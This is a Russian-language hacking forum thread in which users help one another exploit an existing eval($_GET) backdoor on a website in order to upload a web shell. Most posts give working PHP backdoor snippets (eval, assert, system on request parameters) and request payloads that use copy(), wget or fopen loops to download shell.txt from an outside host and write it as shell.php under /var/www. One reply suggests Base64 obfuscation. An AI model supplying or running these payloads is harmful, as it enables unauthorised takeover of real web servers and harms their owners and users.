Помогите воспользоваться уязвимостью

Discussion in 'Песочница' started by LamerHacker, 23 Sep 2010.

  1. LamerHacker

    LamerHacker New Member

    Joined:
    22 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Есть одна уязвимость, точнее Бэкдор в одном скрипте
    PHP:
    eval ($_GET['q']);
    Хочу залить на сайт шелл, проблема в том, что кавычки в параметрах $_GET экранизируется, поэтому ничего не выходит :(
     
  2. LamerHacker

    LamerHacker New Member

    Joined:
    22 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Пока ждал ответа мысль сама пришла в голову
    Если кому интересно, то вот мой вариант
    index.php?q=$_GET[q2]=stripslashes($_GET[q2]);eval($_GET[q2]);&q2=copy("http://site.ru/shell.txt","shell.php");
     
  3. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Code:
    <?php
    eval(stripslashes($_REQUEST[cmd]));
    ?>
    
    или

    Code:
    <?php
    assert(stripslashes($_REQUEST[cmd]));
    ?>
    
    Code:
    cmd=copy('http://site.ru/shell.txt','/var/www/shell.php');
    
    Без stripslashes

    Code:
    <?php
    eval($_REQUEST[cmd]);
    ?>
    
    Code:
    cmd=copy($_REQUEST[a],$_REQUEST[b]);&a=http://site.ru/shell.txt&b=/var/www/shell.php
    
    Через wget, curl, fetch и другие качалки

    Code:
    <?php
    system($_REQUEST[cmd]);
    ?>
    
    Code:
    cmd=wget http://site.ru/shell.txt -O /var/www/shell.php
    
    Ну, а если, все таки, очень хочется по извращаться

    Code:
    eval($_REQUEST[cmd]);
    
    Code:
    cmd=$a=fopen($_REQUEST[b],$_REQUEST[bb]);$b=fopen($_REQUEST[c],$_REQUEST[cc]);while(!feof($a)){$res=fgets($a);fputs($b,$res);}&bb=b&cc=w+&b=http://site.ru/shell.txt&c=/var/www/shell.php
    
     
    #3 h00lyshit!, 24 Sep 2010
    Last edited: 8 Mar 2011
    1 person likes this.
  4. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Я бы ваапще использовал Base64.
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Redwood, видимо, он править не имеет возможности скрипт, поэтому юзать только может eval ($_GET['q']); (то, что какой-то хацкер прописал до него)
     
Loading...
Similar Threads - Помогите воспользоваться уязвимостью
  1. zase
    Replies:
    1
    Views:
    3,556
  2. Shadows_God
    Replies:
    14
    Views:
    8,090